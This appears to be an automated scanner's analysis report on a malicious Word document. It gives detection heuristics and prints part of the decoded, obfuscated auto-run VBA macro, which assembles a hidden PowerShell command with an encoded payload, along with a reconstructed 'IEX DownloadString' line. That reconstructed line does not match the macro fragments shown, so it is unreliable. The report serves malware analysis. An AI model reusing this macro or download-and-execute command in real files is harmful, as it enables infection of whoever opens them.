MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a VBA macro that is automatically executed upon opening. This macro utilizes the Shell() function to run a PowerShell command. The reconstructed PowerShell command, 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"', indicates that it downloads and executes a second-stage payload from the specified URL. This behavior is consistent with a macro-based downloader.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6606826-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6606826-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19959 bytes |
SHA-256: 0276fa37d77bce179b0ff34cf1975afeed9b46b4ec0a43b98d722c2c657286a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TdZiWUY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
nsikJN = HPioz - mnBIT * (uQiXv - CtpvdV / oOjFa * aiJoO + (dEJuf + NrzCYE * 39745 + AGThMm))
clmLTK = cbzHtP - wTQwMQ * (jFVTNU - LWfEY / cwolZ * IztPKm + (KLhzfF + ttfRr * 9978 + FRFUCV))
YzjLlisX ("" + uFhbzsnl + PRjszKBPdS + UkNSQ + UEzWojIwOi + UfKpwv + fiYjHwq + hkJLdWzw)
bDzVV = ulDYJ - AwDtEU * (Nhbaii - LszEru / wSzTv * djQpEf + (fdMrul + jXzdS * 74318 + LBlwh))
jQWuU = DinvHQ - wJCVG * (NwDqG - Vjtoi / DTwcl * jDzEO + (tDQQL + aBsdo * 30104 + ZPkzGJ))
End Sub
Attribute VB_Name = "CiEaJiOh"
Function UkNSQ()
On Error Resume Next
BjswK = 90909 - cOPOw + 61630 / HbqDp * oIHhrv * tEzHm - oDpDlH * oCAnQk
JwCfod = 57934 + YUQvU / KMXsN * Dvhni / (15563 / WwiRb - fOCijz - OzvZA)
aXrXTTbow = "p" + YEWLoft + FPmOYOIb + "o" + USXEvJKlITRGd + jukbHJKQsjrta + "we" + fojZMoAzaBit + twlLarT + "rsh" + thJCiYE + HXodXEOzjuJZ + "ell" + ZKziGhAmR + qsClVbWlvmOQQ + " .(" + wbLYOaQRkrip + jUFhojLMNKTm + " $E" + dLtjHYlYassO + StrmYCMSIjb + "nv:" + kOBFblinZw + YzKtNoaHltTT + "C" + lVLDKINDB + mRcrmtvvDz + "oMs" + YuuAnkq + ZNzMcVnnVVvA + "pe" + XzQwAXXdOjU + PHaSKPqN + "c[4" + iKXHIiiJAET + XlqWLvz + "," + pNYjvDkkdNSUl + QPukWTiorDD + "15," + tfRFJlUJjc + ZQaGEilzNGw + "2" + zZHZjcsWQ + wNKzTShmHJzDHi + "5]"
EoiiY = 92767 - jELNZV + 70123 / qOuIs * SwTNd * ZwZMt - iBLrU * zKuiw
RjGmj = 30770 - MMNkCz + 90783 / IYcJq * livZJ * FAVzqt - amKEP * XwnFif
Knmwro = 43901 - rlqKRu + 55926 / hfwTD * iBztbK * ajzcXT - nBhYXa * PUjDXU
jnOXjHlNZiS = "-jo" + AXlXElz + MNQBrhub + "i" + jzZwdwTjSqEq + hwFmwbBEj + "N'" + MaNczIvX + EaaIalEiIHW + "'" + UtbIfVi + NlQVFEThJ + ") (" + icYfdVqzabFot + jXAPBUFqNorFj + " " + azDbTsVw + flAmIwXw + "New" + vjuQXdlKqm + wOAHlRFA + "-o" + WEWjEDFrUIT + uDmEpGKFs + "BJe" + ommALFrLGU + unZiFzRHqRwFE + "CT" + PuDViJBv + EjPRIZvlN + " Io"
WwGhAY = 16941 - DnYzw + 58587 / MEGzcv * jaJVU * jszjzr - FNJFX * NwcfYa
QYEGa = 75999 - WojvMt + 53246 / Cwifs * HQBTCp * sCUrGv - VzPDWX * dkITW
YENYNv = 37586 - fYiEi + 53535 / nrzFI * wuAamh * Hvkua - HomHmv * silbT
ZfvMJBYvY = "." + pnaVlMZJMwaO + knkisUW + "C" + KJGmQJZGbvVS + ZoZhiaJM + "o" + mzzqpTSOoDQLi + znrzSrod + "M" + pTmrabwc + SMiRHdG + "Pr" + tNKzXfn + OwwUTfzAf + "E" + cRjNZrnEZ + kKZkwiTOMnJlN + "ssI" + zsCRHzk + bdwajrirVZN + "ON" + ihUjRJaSjWuXuu + jrzuzIUi + ".D" + VESPoFOBJVwb + pJvGBDlzhjm + "Ef" + twaMmnioV + hpIskjLHL + "L"
nNNjp = (YXjcHr * 40585 + 6644 + IKnzmT * 19171 + ZMusMA / (iVonK * wGzmQ * 96384 / 31547))
wnpBXA = (Omldj * 78261 + 38279 + DLWKwl * 4428 + tWJEqL / (VtpwO * DKdXK * 14753 / 4126))
WRiRVlqFkw = "a" + KmCiEbFqpwG + NwdCQQktqFo + "tEs" + tnndAiM + RncRtowJSAHfPa + "tRe" + llwkTjO + iSDLvbj + "AM(" + fpawWwvjn + VdMGZOtQHflZu + "[I" + VvzWZXsB + imPzonsapiEFw + "o." + iTfitQfkKazj + VcbQPubdQ + "mE" + swFjHPzLpqEMT + wCEZpDbMTFd + "m" + rFECMpBRaDD + XcXQQHO + "or" + ZYrdoQmlbdaTTj + zdAJXwB + "YST" + fzoDoVaqvffLj + ipcZkhEsmPQi + "r" + ZaXcpIRwimI + YDFqQdOihVb + "E" + bGCnYrLK + IiurUjH + "am]"
jEfoj = (zBzCr * 9575 + 92980 + hhKwuO * 33125 + SCwzHW / (uzZjJu * vRVOY * 80930 / 22894))
iEPJsEUrl = "[S" + LkMKJkNbAvmdqi + PFERYmDilsa + "y" + bcKXwlXKakNME + QRbmzwaGDNbZji + "Ste" + JimZTcGrz + pUqFUcENT + "M" + htAVGJXMrbBTE + kfoLkpEdl + ".Co" + IGwbVEAV + YzVwTlBrnBmbC + "n" + YIfwcQPkuB + QGzSidZMi + "veR" + RECmzjZhD + wvUXYcI + "t" + vBVlkpjEzdj + uOtadSA + "]" + NLNKBzLFwE + SPjQBHAVjZYLr + ":" + dzwqMGa + Yaoltshb + ":F" + bwKJbKzz + nCTzriHzOJlrb + "rO" + bTPcrswriZHSo + MHqzWVHotLk + "M" + KbjXlRArk + vrLoakPTaiziBc + "BAs" + UiVRGIijCp + WWobkwEiKSOJ + "E" + JfNzhuhuf + FnnJfmkAh + "64" + tWtFYYM + LVowCSFIp + "s" + rbLiIQUfjiJ + GmrEcWIidz + "Tr"
zoHMjc = (iTMRK * 27920 + 94554 + DjWlC * 15230 + rPbBf / (ruOiI * JbNTzB * 97190 / 60853))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.